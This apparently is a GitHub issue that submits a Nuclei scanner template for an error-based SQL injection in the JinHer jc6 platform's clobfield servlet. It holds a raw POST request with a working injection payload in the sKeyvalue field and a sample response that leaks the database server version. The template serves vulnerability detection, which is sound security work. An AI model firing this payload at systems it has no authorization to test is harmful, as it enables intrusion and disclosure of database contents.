### ISSUE TITLE
[nuclei-template] 

### ISSUE THREAD

**Issue by Kygoss** [projectdiscovery/nuclei-templates#8842]
### Template Information:

JinHer Intelligent Collaborative Management Platform has error-based sql injection in path /jc6/servlet/clobfield
reference: https://blog.csdn.net/qq_41904294/article/details/135074649

### Nuclei Template:

```yaml
id: jinher-jc6-clobfield-sqli

info:
  name: JinHer jc6 clobfield error-based sql injection
  author: Ky9oss
  severity: high
  description: JinHer Intelligent Collaborative Management Platform has error-based sql injection
  reference:
  metadata:
    max-request: 1
    verified: "true"
  tags: jinher,jc6,sqli

requests:
  - raw:
      - |
        POST /jc6/servlet/clobfield HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/x-www-form-urlencoded
        Host: {{Hostname}}

        key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11' and CONVERT(int,@@VERSION)=1 and ''='

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,"Microsoft SQL Server")
        condition: and
```

Response example:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 255
Date: Tue, 19 Dec 2023 05:33:55 GMT

在将 nvarchar 值 'Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) 
	Oct 19 2012 13:38:57 
	Copyright (c) Microsoft Corporation
	Enterprise Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) (Hypervisor)
' 转换成数据类型 int 时失败。
